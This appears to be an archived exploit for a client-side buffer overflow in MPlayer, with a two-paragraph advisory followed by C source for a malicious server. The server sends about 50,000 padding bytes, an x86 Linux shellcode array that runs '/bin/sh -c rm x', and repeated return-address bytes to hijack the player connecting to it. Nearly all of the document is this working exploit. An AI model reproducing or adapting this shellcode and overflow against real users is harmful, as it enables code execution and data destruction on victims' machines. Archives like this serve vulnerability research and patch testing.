109 lines
No EOL
2.2 KiB
C
109 lines
No EOL
2.2 KiB
C
// source: https://www.securityfocus.com/bid/11962/info
|
|
|
|
A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.
|
|
|
|
An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.
|
|
|
|
char payload[] = {
|
|
0xeb ,0x47
|
|
,0x59
|
|
,0x89 ,0xca
|
|
,0x83 ,0xc2 ,0x18
|
|
,0x89 ,0x11
|
|
,0x31 ,0xc0
|
|
,0x89 ,0x41 ,0x04
|
|
,0x83 ,0xc2 ,0x13
|
|
,0x89 ,0x51 ,0x08
|
|
,0x83 ,0xc2 ,0x08
|
|
,0x89 ,0x51 ,0x0c
|
|
,0x83 ,0xc2 ,0x03
|
|
,0x89 ,0x51 ,0x10
|
|
,0x89 ,0x41 ,0x14
|
|
,0x88 ,0x41 ,0x2a
|
|
,0x88 ,0x41 ,0x32
|
|
,0x88 ,0x41 ,0x35
|
|
,0x88 ,0x41 ,0x3a
|
|
,0x51
|
|
,0x83 ,0xc1 ,0x08
|
|
,0x51
|
|
,0x83 ,0xc1 ,0x20
|
|
,0x83 ,0xc1 ,0x03
|
|
,0x51
|
|
,0x83 ,0xc0 ,0x3b
|
|
,0x50
|
|
,0xcd ,0x80
|
|
,0x31 ,0xc0
|
|
,0x50
|
|
,0x40
|
|
,0x50
|
|
,0xcd ,0x80
|
|
,0xe8 ,0xb4 ,0xff ,0xff ,0xff
|
|
,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
|
|
,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
|
|
,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
|
|
,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
|
|
,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
|
|
,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
|
|
,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
|
|
,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
|
|
,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
|
|
,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
|
|
} ;
|
|
|
|
#include <stdio.h>
|
|
|
|
main()
|
|
{
|
|
|
|
char buf[256];
|
|
int len;
|
|
int s,i;
|
|
len=recv(0,buf,256,0);
|
|
|
|
printf("hello\n");
|
|
fflush(stdout);
|
|
|
|
len=recv(0,buf,256,0);
|
|
|
|
printf("hello\n");
|
|
fflush(stdout);
|
|
|
|
len=recv(0,buf,256,0);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
fflush(stdout);
|
|
|
|
len=recv(0,buf,256,0);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
putchar(0x03);
|
|
for (i=0;i<50000;i++)
|
|
putchar('A');
|
|
for (i=0;i<sizeof payload;i++)
|
|
putchar (payload[i]);
|
|
|
|
printf("123");
|
|
for (i=0;i<20000;i++) // RA all the way....
|
|
{
|
|
putchar(0x01);
|
|
putchar(0x15);
|
|
putchar(0xbb);
|
|
putchar(0xbf);
|
|
}
|
|
fflush(stdout);
|
|
} |